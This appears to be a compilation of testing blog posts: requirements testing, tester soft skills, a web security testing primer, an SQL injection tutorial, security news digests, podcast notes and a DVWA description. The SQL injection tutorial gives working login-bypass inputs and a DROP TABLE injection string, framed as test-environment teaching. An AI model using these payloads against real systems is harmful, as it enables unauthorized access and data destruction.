Well, we need to define some standard tests to measure the requirements. Once each requirement is passed through these tests you can evaluate and freeze the functional requirements.

Let’s take an example. You are working on a web based application. Requirement is as follows:
“Web application should be able to serve the user queries as early as possible”

How will you freeze the requirement in this case?
What will be your requirement satisfaction criteria? To get the answer, ask this question to stakeholders: How much response time is ok for you?
If they say, we will accept the response if it’s within 2 seconds, then this is your requirement measure. Freeze this requirement and carry the same procedure for next requirement.

We just learned how to measure the requirements and freeze those in design, implementation and testing phases.

Now let’s take other example. I was working on a web based project. Client (stakeholders) specified the project requirements for initial phase of the project development. My manager circulated all the requirements in the team for review. When we started discussion on these requirements, we were just shocked! Everyone was having his or her own conception about the requirements. We found lot of ambiguities in the ‘terms’ specified in requirement documents, which later on sent to client for review/clarification.

Client used many ambiguous terms, which were having many different meanings, making it difficult to analyze the exact meaning. The next version of the requirement doc from client was clear enough to freeze for design phase.

From this example we learned “Requirements should be clear and consistent”

Next criteria for testing the requirements specification is “Discover missing requirements”

Many times project designers don’t get clear idea about specific modules and they simply assume some requirements while design phase. Any requirement should not be based on assumptions. Requirements should be complete, covering each and every aspect of the system under development.

Specifications should state both type of requirements i.e. what system should do and what should not.

Generally I use my own method to uncover the unspecified requirements. When I read the software requirements specification document (SRS), I note down my own understanding of the requirements that are specified, plus other requirements SRS document should supposed to cover. This helps me to ask the questions about unspecified requirements making it clearer.

For checking the requirements completeness, divide requirements in three sections, ‘Must implement’ requirements, requirements those are not specified but are ‘assumed’ and third type is ‘imagination’ type of requirements. Check if all type of requirements are addressed before software design phase.

Check if the requirements are related to the project goal.
Some times stakeholders have their own expertise, which they expect to come in system under development. They don’t think if that requirement is relevant to project in hand. Make sure to identify such requirements. Try to avoid the irrelevant requirements in first phase of the project development cycle. If not possible ask the questions to stakeholders: why you want to implement this specific requirement? This will describe the particular requirement in detail making it easier for designing the system considering the future scope.

But how to decide the requirements are relevant or not?
Simple answer: Set the project goal and ask this question: If not implementing this requirement will cause any problem achieving our specified goal? If not, then this is irrelevant requirement. Ask the stakeholders if they really want to implement these types of requirements.

In short requirements specification (SRS) doc should address following:
Project functionality (What should be done and what should not)
Software, Hardware interfaces and user interface
System Correctness, Security and performance criteria
Implementation issues (risks) if any

Conclusion:
I have covered all aspects of requirement measurement. To be specific about requirements, I will summarize requirement testing in one sentence:
“Requirements should be clear and specific with no uncertainty, requirements should be measurable in terms of specific values, requirements should be testable having some evaluation criteria for each requirement, and requirements should be complete, without any contradictions”

Testing should start at requirement phase to avoid further requirement related bugs. Communicate more and more with your stakeholder to clarify all the requirements before starting project design and implementation.

It’s a every testers question. How to be a good tester? Apart from the technical knowledge, testing skills, tester should have some personal level skills which will help them to build a good rapport in the testing team.

What are these abilities , skills which make a tester as a good tester? Well, I was reading Dave Whalen’s article “Ugly Baby Syndrome!” and found it very interesting. Dave compared software developers with the parents who deliver a baby (software) with countless efforts. Naturally the product managers, architectures, developers spent their countless time on developing application for the customer. Then they show it to us (testers) and asks: “ How is the baby (Application)? “ And testers tell them often that they have and ugly baby. (Application with Bugs!)

Testers don’t want to tell them that they have ugly baby, but unfortunately its our job. So effectively tester can convey the message to the developers without hurting them. How can be this done? Ya that is the skill of a good tester!

Here are the tips sated by Dave to handle such a delicate situation:

Be honest and Responsive:
Tell developers what are your plans to attack their application.

Be open and available:
If any dev ask you to have a look at the application developed by him before the release, then politely give feedback on it and report any extra efforts needed. Don’t log the bug’s for these notes.

Let them review your tests:
If you have designed or wrote some test cases from the requirement specifications then just show them those test cases. Let them know your stuff as you are going to critic on developers work!

Use of Bug tracker:
Some testers have habit to report each and everything publicly. This attitude hurts the developers. So if you have logged any bug then let the bug tracking system report it to respective developers and managers. Also don’t each time rely on bug tracker, talk personally to developers what you logged and why you logged?

Finally some good personal points:

Don’t take it personally:
Do the job of messenger. You could be a close target always. So build a thick skin!

Be prepared:
A good message in the end, Be prepared for everything! If worst things might not happened till now but they can happen at any moment in your career. So be ready to face them.

[Thougt of the Day: When a virtually flawless application is delivered to a customer, no one says how well tested it was. Development teams will always get the credit. However, if it is delivered with bugs, everyone will wonder who tested it! - - Dave Whalen]

Introduction

As more and more vital data is stored in web applications and the number of transactions on the web increases, proper security testing of web applications is becoming very important. Security testing is the process that determines that confidential data stays confidential (i.e. it is not exposed to individuals/ entities for which it is not meant) and users can perform only those tasks that they are authorized to perform (e.g. a user should not be able to deny the functionality of the web site to other users, a user should not be able to change the functionality of the web application in an unintended way etc.).

Some key terms used in security testing

Before we go further, it will be useful to be aware of a few terms that are frequently used in web application security testing:

What is “Vulnerability”?
This is a weakness in the web application. The cause of such a “weakness” can be bugs in the application, an injection (SQL/ script code) or the presence of viruses.

What is “URL manipulation”?
Some web applications communicate additional information between the client (browser) and the server in the URL. Changing some information in the URL may sometimes lead to unintended behavior by the server.

What is “SQL injection”?
This is the process of inserting SQL statements through the web application user interface into some query that is then executed by the server.

What is “XSS (Cross Site Scripting)”?
When a user inserts HTML/ client-side script in the user interface of a web application and this insertion is visible to other users, it is called XSS.

What is “Spoofing”?
The creation of hoax look-alike websites or emails is called spoofing.
Security testing approach:

In order to perform a useful security test of a web application, the security tester should have good knowledge of the HTTP protocol. It is important to have an understanding of how the client (browser) and the server communicate using HTTP. Additionally, the tester should at least know the basics of SQL injection and XSS. Hopefully, the number of security defects present in the web application will not be high. However, being able to accurately describe the security defects with all the required details to all concerned will definitely help.

1. Password cracking:

The security testing on a web application can be kicked off by “password cracking”. In order to log in to the private areas of the application, one can either guess a username/ password or use some password cracker tool for the same. Lists of common usernames and passwords are available along with open source password crackers. If the web application does not enforce a complex password (e.g. with alphabets, number and special characters, with at least a required number of characters), it may not take very long to crack the username and password.

If username or password is stored in cookies without encrypting, attacker can use different methods to steal the cookies and then information stored in the cookies like username and password.

2. URL manipulation through HTTP GET methods:

The tester should check if the application passes important information in the querystring. This happens when the application uses the HTTP GET method to pass information between the client and the server. The information is passed in parameters in the querystring. The tester can modify a parameter value in the querystring to check if the server accepts it.

Via HTTP GET request user information is passed to server for authentication or fetching data. Attacker can manipulate every input variable passed from this GET request to server in order to get the required information or to corrupt the data. In such conditions any unusual behavior by application or web server is the doorway for the attacker to get into the application.

3. SQL Injection:

The next thing that should be checked is SQL injection. Entering a single quote (‘) in any textbox should be rejected by the application. Instead, if the tester encounters a database error, it means that the user input is inserted in some query which is then executed by the application. In such a case, the application is vulnerable to SQL injection.

SQL injection attacks are very critical as attacker can get vital information from server database. To check SQL injection entry points into your web application, find out code from your code base where direct MySQL queries are executed on database by accepting some user inputs.

If user input data is crafted in SQL queries to query the database, attacker can inject SQL statements or part of SQL statements as user inputs to extract vital information from database. Even if attacker is successful to crash the application, from the SQL query error shown on browser, attacker can get the information they are looking for. Special characters from user inputs should be handled/escaped properly in such cases.

4. Cross Site Scripting (XSS):

The tester should additionally check the web application for XSS (Cross site scripting). Any HTML e.g. <HTML> or any script e.g. <SCRIPT> should not be accepted by the application. If it is, the application can be prone to an attack by Cross Site Scripting.

Attacker can use this method to execute malicious script or URL on victim’s browser. Using cross-site scripting, attacker can use scripts like JavaScript to steal user cookies and information stored in the cookies.

Many web applications get some user information and pass this information in some variables from different pages.

E.g.: http://www.examplesite.com/index.php?userid=123&query=xyz

Attacker can easily pass some malicious input or <script> as a ‘&query’ parameter which can explore important user/server data on browser.

Important: During security testing, the tester should be very careful not to modify any of the following:

• Configuration of the application or the server
• Services running on the server
• Existing user or customer data hosted by the application

Additionally, a security test should be avoided on a production system.

The purpose of the security test is to discover the vulnerabilities of the web application so that the developers can then remove these vulnerabilities from the application and make the web application and data safe from unauthorized actions.

Security testing of web applications against SQL Injection, explained with simple examples – By Inder P Singh.

Many applications use some type of a database. An application under test might have a user interface that accepts user input that is used to perform the following tasks:

1.    Show the relevant stored data to the user e.g. the application checks the credentials of the user using the log in information entered by the user and exposes only the relevant functionality and data to the user

2.    Save the data entered by the user to the database e.g. once the user fills up a form and submits it, the application proceeds to save the data to the database; this data is then made available to the user in the same session as well as in subsequent sessions

Some of the user inputs might be used in framing SQL statements that are then executed by the application on the database. It is possible for an application NOT to handle the inputs given by the user properly. If this is the case, a malicious user could provide unexpected inputs to the application that are then used to frame and execute SQL statements on the database. This is called SQL injection. The consequences of such an action could be alarming.

The following things might result from SQL injection:

1. The user could log in to the application as another user, even as an administrator.

2. The user could view private information belonging to other users e.g. details of other users’ profiles, their transaction details etc.

3. The user could change application configuration information and the data of the other users.

4. The user could modify the structure of the database; even delete tables in the application database.

5. The user could take control of the database server and execute commands on it at will.

Since the consequences of allowing the SQL injection technique could be severe, it follows that SQL injection should be tested during the security testing of an application. Now with an overview of the SQL injection technique, let us understand a few practical examples of SQL injection.

Important: The SQL injection problem should be tested only in the test environment.

If the application has a log in page, it is possible that the application uses a dynamic SQL such as statement below. This statement is expected to return at least a single row with the user details from the Users table as the result set when there is a row with the user name and password entered in the SQL statement.

SELECT * FROM Users WHERE User_Name = ‘” & strUserName & “‘ AND Password = ‘” & strPassword & “’;”

If the tester would enter John as the strUserName (in the textbox for user name) and Smith as strPassword (in the textbox for password), the above SQL statement would become:

SELECT * FROM Users WHERE User_Name = ‘John’ AND Password = ‘Smith’;

If the tester would enter John’– as strUserName and no strPassword, the SQL statement would become:

SELECT * FROM Users WHERE User_Name = ‘John’– AND Password = ‘Smith’;

Note that the part of the SQL statement after John is turned into a comment. If there were any user with the user name of John in the Users table, the application could allow the tester to log in as the user John. The tester could now view the private information of the user John.

What if the tester does not know the name of any existing user of the application? In such a case, the tester could try common user names like admin, administrator and sysadmin. If none of these users exist in the database, the tester could enter John’ or ‘x’=’x as strUserName and Smith’ or ‘x’=’x  as strPassword. This would cause the SQL statement to become like the one below.

SELECT * FROM Users WHERE User_Name = ‘John’ or ‘x’=’x’ AND Password = ‘Smith’ or ‘x’=’x’;

Since ‘x’=’x’ condition is always true, the result set would consist of all the rows in the Users table. The application could allow the tester to log in as the first user in the Users table.

Important: The tester should request the database administrator or the developer to copy the table in question before attempting the following SQL injection.

If the tester would enter John’; DROP table users_details;’—as strUserName and anything as strPassword, the SQL statement would become like the one below.

SELECT * FROM Users WHERE User_Name = ‘John’; DROP table users_details;’ –‘ AND Password = ‘Smith’;

This statement could cause the table “users_details” to be permanently deleted from the database.

Though the above examples deal with using the SQL injection technique only the log in page, the tester should test this technique on all the pages of the application that accept user input in textual format e.g. search pages, feedback pages etc.

SQL injection might be possible in applications that use SSL. Even a firewall might not be able to protect the application against the SQL injection technique.

I have tried to explain the SQL injection technique in a simple form. I would like to re-iterate that SQL injection should be tested only in a test environment and not in the development environment, production environment or any other environment. Instead of manually testing whether the application is vulnerable to SQL injection or not, one could use a web vulnerability scanner that checks for SQL injection.

Provided by CommunityDNS, the information in this post consists of news items in the security-based Internet community.

Security firm chokes sprawling spam botnet

The efforts of a research firm took down a botnet responsible for 33% of the world’s spam.

The attack was multipronged. First the security firm reported abuses to ISPs regarding certain IP addresses. Secondly, the firm worked with registrars to deactivate registered names. Third, the firm registered backup domains that were not used, and fourth, the botnet was able to generate random domains based on a specific algorithm. The firm understood the algorithm and registered names possibly generated by this algorithm.

The effect was a botnet that had no where to turn. Now the individual bots have been orphaned and the security firm is working with the ISPs to notify the computer owners whose computers were once members of the botnet.

Click here for more information.

MassMutual Warns of Data Breach

Employee and customer data for MassMutual could have been compromised. Data handled by a third party provider was breached.

Click here for more information.

Majority of Web Apps Have Severe Vulnerabilities

A recent report indicates that close to 9 out of 10 web applications could lead to information exposure due to flaws as 87% of the Web applications analyzed had serious vulnerabilities.

60% of Internet-based attacks targeted Web applications. 90% of web vulnerabilities rested with commercial Web applications while 8% rested with browser-run applications.

25% of the attacks were SQL Injection-based with 17% of the attacks being attributed to Cross Site Scripting

Click here for more information.

No Rush to Adopt Domain Names Written in Chinese in China

While ICANN has opened the gates for IDNs to begin in certain countries, China being one of them, it appears there is no great rush to acquire the Chinese equivalent of the currently used Latin character set.

In many cases Chinese organizations have reduced the number of characters to make it easier for Chinese to type in the URL. For example “Tenchnt” is known as “qq.com” for its users. Another company has used “163.com” as the URL for its brand name as companies often associate numbers with their brands.

In one case where someone has already grabbed the Chinese equivalent to one company’s name, the head of the company would like to purchase the name, but feels having it owned by another party would not create any harm to their existing brand.

While the Chinese character sets will aid Internet usage for the older population, the majority of China’s Internet population is already used to the current method of using the Internet.

Click here for more information.

Provided by CommunityDNS, the information in this post consists of news items in the security-based Internet community.

Bot herders hide master control channel in Google cloud

Google’s “AppEngine” application was used by cybercriminals to act as the master control channel, feeding commands to large networks of infected computers.

Also, it was found that the Koobface botnet was using Google Reader to spam malicious links to social networking sites; one of which being Facebook.

Click here for more information.

Gumblar Botnet Resurges

Known as one of the largest botnets that grew dramatically this year, Gumblar has reappeared.

Gumblar works in two ways. The first is to load malware onto sites. When users visit the sites malware is downloaded onto their computers. The second way Gumblar works is to populate websites with I-frames pointing to websites containing the malware.

Click here for more information.

New Spamming Botnet On The Rise

Currently sending 2.5 billion spam messages globally a new Botnet, known as “Festi” has quickly jumped to the rank of 5% to 6% of all spam generated. The jump means more bots (or compromised computers) were added into its botnet with 60% located in Asia, 18% in Europe and 9% in North America.

Click here for more information.

Practical Analysis: The Fastest-Growing Security Threat

Having grown from a few thousand a day a year ago to more than 500,000 a day SQL Injection is the fastest-growing security threat. Through the use of automated tools cybercriminals are searching for which sites are vulnerable to SQL injection. Such attacks allow hackers to break into networks that can lead to the breach of sensitive data.

Click here for more information.

UK to push for law to retain all communications data

Citing the EU Data Retention Directive does not go far enough and to prevent serious crime and terrorism the British government is pushing for its ISPs to capture and hold data regarding instant messages, e-mail and other electronic communications. The data retained would also include data from third-party services. The data is to be retained by the respective ISPs and not in a centralized database.

Click here for more information.

30 minutes every week on data security, privacy, and the law…..(plus or minus ten)

On this week’s program:

* Why are web drive-by downloads proliferating like cockroaches?

* Sixty Minutes just covered a data security story. We rate the coverage.

* Our take on this week’s news.

–> Stream This Week’s Show with our Built-In Flash Player:

–> Scroll down to see links and show notes for this week’s show

–> Stream, subscribe or download Episode 78 – Listen or subscribe to the feed to automatically get the latest episode sent to you to your Google, Yahoo, iTunes, or other popular sites.

–>Tune into the show directly on iTunes, you can also subscribe to the program on iTunes.

–> A simple way to listen to the show from with stricter firewalls: Listen from Odeo. This site works better if you are behind a more restrictive enterprise firewall.

Please visit our sponsors, and be sure to let them know you heard about them on The Data Security Podcast:

• Vipre Anti-Virus, the complete Antimalware solution by Sunbelt Software. If you TRY the enterprise version, you get the home version for FREE! Go to: http://www.testdrivevipre.com .

• GamaSec Web App Scans: Spots cyber-hazards on your web site, and has advanced zero-day protection. GET YOUR FREE BASIC WEB APP SCAN, plus a special offer just for listeners to The Data Security Podcast. Go here to sign up, and add the offer code: Podcast.

• SonicWall;  Get the super fast UTM firewall that’s rated Five Stars (the Best rating) by Secure Computing Magazine.  Data Clone Labs is the premier SonicWall Medallion Partner for all your security needs.

• DeviceLock; Software that controls, manages and helps encrypt USB drives and other removable media. Get a free trial on their site, and be sure to let them know you heard about them on The Data Security Podcast.

Show Notes for Episode 78 of the Data Security Podcast

* Conversation:  Ira talks with Georg Hess, CEO and Co-Founder, Art of Defence, about network scans versus web application scans. OWASP AppSec DC 2009 takes place this week,  November 10-13th, in Washington, DC. The Open Web Application Security Project (OWASP) is a worldwide free and open community focused on improving the security of application software. Their mission is to make application security visible,  so that people and organizations can make informed decisions about true application security risks.

* Tales From The Dark Web:  Our take on the 60 Minutes segment Sabotaging The System:  Could hackers get into the computer systems that run crucial elements of the world’s infrastructure, such as the power grids, water works or even a nation’s military arsenal? Be sure to watch this video segment with the highest level non-technical boss in your organization. Also, make sure you, and your non-technical boss watch the “Web Extras” from this segment.  One of the stunning parts of the segment was the claim that private companies are more vulnerable because the companies only care about profit. Unlike government networks, which are more secure (uh?).  If that was the case, how can that be squared against the portion of the segment that revealed that the Feds lost 12TB of data from the DOD, DOE, DOC and possible NASA, in 2007? Where was the profit motive that stopped good security in those organizations? Security expert Robert Graham explores this, and other issues, in this posting: Brazil outage NOT caused by hackers.

* From Our Take on The News:  New open-source voting technology – the developer is looking for jurisdictions to try it for free.  Read the Wired account.

* From Our Take on The News:  A technical overview of the newly discovered SSL vulnerabilities and possible mitigation. Ben Laurie has excellent, technical blog postings about the SSL protocol flaw.

* From Our Take on The News:  Voters hate traffic surveillance cameras — proven in three U. S. cities in last week’s elections. (As if we still need proof.) Great coverage of traffic surveillance and related matters in Maryland. (But the topic is universal).

* From The Wrap:  First iPhone worm found, details at F-Secure.  A how-to for changing the SSH default password in your jailbroken iPhone; one uses a computer connected to your iPhone to change the SSH settings.  Note: If you are not using a jailbroken iPhone, you don’t need to make changes to be protected from this particular attack.

Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.

Vulnerabilities:

Damn Vulnerable Web App is damn vulnerable! Do not upload it to your hosting provider’s public html folder or any working web server as it will be hacked. I recommend downloading and installing XAMPP onto a local machine inside your LAN which is used solely for testing.

We do not take responsibility for the way in which any one uses Damn Vulnerable Web App (DVWA). We have made the purposes of the application clear and it should not be used maliciously. We have given warnings and taken measures to prevent users from installing DVWA on to live web servers. If your web server is compromised via an installation of DVWA it is not our responsibility it is the responsibility of the person/s who uploaded and installed it.

https://sourceforge.net/projects/dvwa/files/dvwa-1.0.6.zip/download